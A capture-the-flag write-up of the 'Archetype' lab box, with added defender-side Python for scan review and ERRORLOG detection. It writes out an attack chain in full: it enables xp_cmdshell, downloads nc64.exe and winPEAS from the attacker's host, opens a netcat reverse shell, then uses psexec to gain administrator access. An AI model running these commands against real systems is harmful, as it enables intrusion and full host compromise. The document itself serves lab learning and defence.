Archetype
January 27, 2024
# Nmap 7.94 scan initiated Sat Jan 27 06:26:28 2024 as: nmap -sC -sV -oN nmap -vv 10.129.171.182
Increasing send delay for 10.129.171.182 from 0 to 5 due to 41 out of 136 dropped probes since last increase.
Increasing send delay for 10.129.171.182 from 10 to 20 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.129.171.182
Host is up, received conn-refused (0.25s latency).
Scanned at 2024-01-27 06:26:28 PST for 65s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
| 10.129.171.182:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-26T22:25:48
| Not valid after: 2054-01-26T22:25:48
| MD5: e9c3:8935:ecf0:84f2:0ae1:bbfc:2bfb:9e03
| SHA-1: b9d6:0ba9:1d39:00ae:0a72:743b:2d2a:b996:3945:b5d1
| ms-sql-ntlm-info:
| 10.129.171.182:1433:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
|_ssl-date: 2024-01-26T22:27:42+00:00; +9s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-26T22:27:32
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-26T14:27:31-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 59442/tcp): CLEAN (Couldn't connect)
| Check 2 (port 42495/tcp): CLEAN (Couldn't connect)
| Check 3 (port 53074/udp): CLEAN (Timeout)
| Check 4 (port 58756/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h36m09s, deviation: 3h34m41s, median: 8s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 27 06:27:33 2024 -- 1 IP address (1 host up) scanned in 65.86 seconds
nmap -sV -p 445 10.129.171.182
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 06:30 PST
Nmap scan report for 10.129.171.182
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds
I just ran the nmap scan of port 445 a second time because it bugs out when using scripts.
After that we use smbclient to list the shares available on the SMB service.
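As an added defender-side example (not part of the original writeup), the following Python parses nmap's normal (-oN) output in the format shown above and turns the scan into the hardening items a reviewer would act on: SMB signing not enforced, a guest SMB session accepted, and MS SQL reachable on 1433. The embedded excerpt is constructed from the scan's own lines, and the function names are mine.

```python
import re

# Constructed excerpt in nmap -oN format, modelled on the scan above
# (same findings, trimmed to the lines the parser needs).
NMAP_NORMAL_OUTPUT = """\
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2017 14.00.1000.00; RTM
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# port/proto state service reason version  (whitespace collapsed or aligned)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_open_ports(text):
    """Return one dict per open port from nmap's normal (-oN) output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports.append({"port": int(m.group(1)), "service": m.group(4),
                          "version": m.group(6).strip()})
    return ports

def review(text):
    """Flag the exposure a defender would act on in this scan, in scan order."""
    issues = []
    # NSE script output lines start with '|' or '|_'; strip that prefix
    script = [l.lstrip("|_ ").strip() for l in text.splitlines() if l.startswith("|")]
    if any("signing enabled but not required" in l for l in script):
        issues.append("SMB2 signing not required: enforce signing by policy")
    if any(l.startswith("message_signing: disabled") for l in script):
        issues.append("SMB1 signing disabled: disable SMB1 or require signing")
    if any(l == "account_used: guest" for l in script):
        issues.append("guest session accepted: disable guest SMB access")
    for p in parse_open_ports(text):
        if p["service"] == "ms-sql-s":
            issues.append(f"MSSQL reachable on {p['port']}/tcp ({p['version']}): "
                          "restrict with a host firewall")
    return issues
```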
smbclient -L 10.129.171.182
Then we connect to the backups share.
smbclient \\\\10.129.171.182\\backups
cat prod.dtsConfig
cd ~/impacket/examples
python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.171.182 -windows-auth
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.68:8000/nc64.exe -outfile nc64.exe"
Then we execute the payload to get the reverse shell connection.
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.68 443"
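The sp_configure sequence above leaves a trace in the SQL Server ERRORLOG, which records every configuration change. As an added detection example (not from the writeup), this Python parses a constructed ERRORLOG excerpt in that format and raises an alert when xp_cmdshell or a similarly risky option is switched on, noting when 'show advanced options' was enabled in the same session just before; the DANGEROUS option list and the 5-minute window are my assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt (not captured from the box), in the format
# SQL Server uses when sp_configure changes a setting.
ERRORLOG = """\
2024-01-26 22:29:58.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-26 22:30:01.45 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-26 22:31:12.00 spid52      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
"""

CONFIG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options that give a SQL login OS-level or out-of-process execution (assumed list).
DANGEROUS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled",
             "Ad Hoc Distributed Queries"}

def parse_config_changes(text):
    """Return one dict per 'Configuration option ... changed' line."""
    events = []
    for line in text.splitlines():
        m = CONFIG_RE.match(line)
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                           "spid": m["spid"], "option": m["opt"],
                           "old": int(m["old"]), "new": int(m["new"])})
    return events

def alerts(text, window=timedelta(minutes=5)):
    """Return (severity, message) for each dangerous option switched on.

    The message also notes when the same session enabled 'show advanced
    options' within `window` beforehand, the step that makes xp_cmdshell
    configurable at all.  Server-side remediation is
    EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE; plus a review of the login.
    """
    events = parse_config_changes(text)
    out = []
    for i, ev in enumerate(events):
        if ev["option"] not in DANGEROUS or not (ev["old"] == 0 and ev["new"] != 0):
            continue
        chained = any(p["spid"] == ev["spid"] and p["option"] == "show advanced options"
                      and p["new"] == 1 and ev["ts"] - p["ts"] <= window
                      for p in events[:i])
        msg = f"{ev['ts']:%Y-%m-%d %H:%M:%S} {ev['spid']} enabled '{ev['option']}'"
        if chained:
            msg += " (preceded by 'show advanced options' in the same session)"
        out.append(("HIGH", msg))
    return out
```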
cd ~/Downloads
python3 -m http.server
powershell
wget http://10.10.14.68:8000/winPEASx64.exe -outfile winPEASx64.exe
Just execute winPEAS.
Then we get the result here.
Move to the impacket examples directory.
cd ~/impacket/examples
python3 psexec.py administrator@10.129.171.182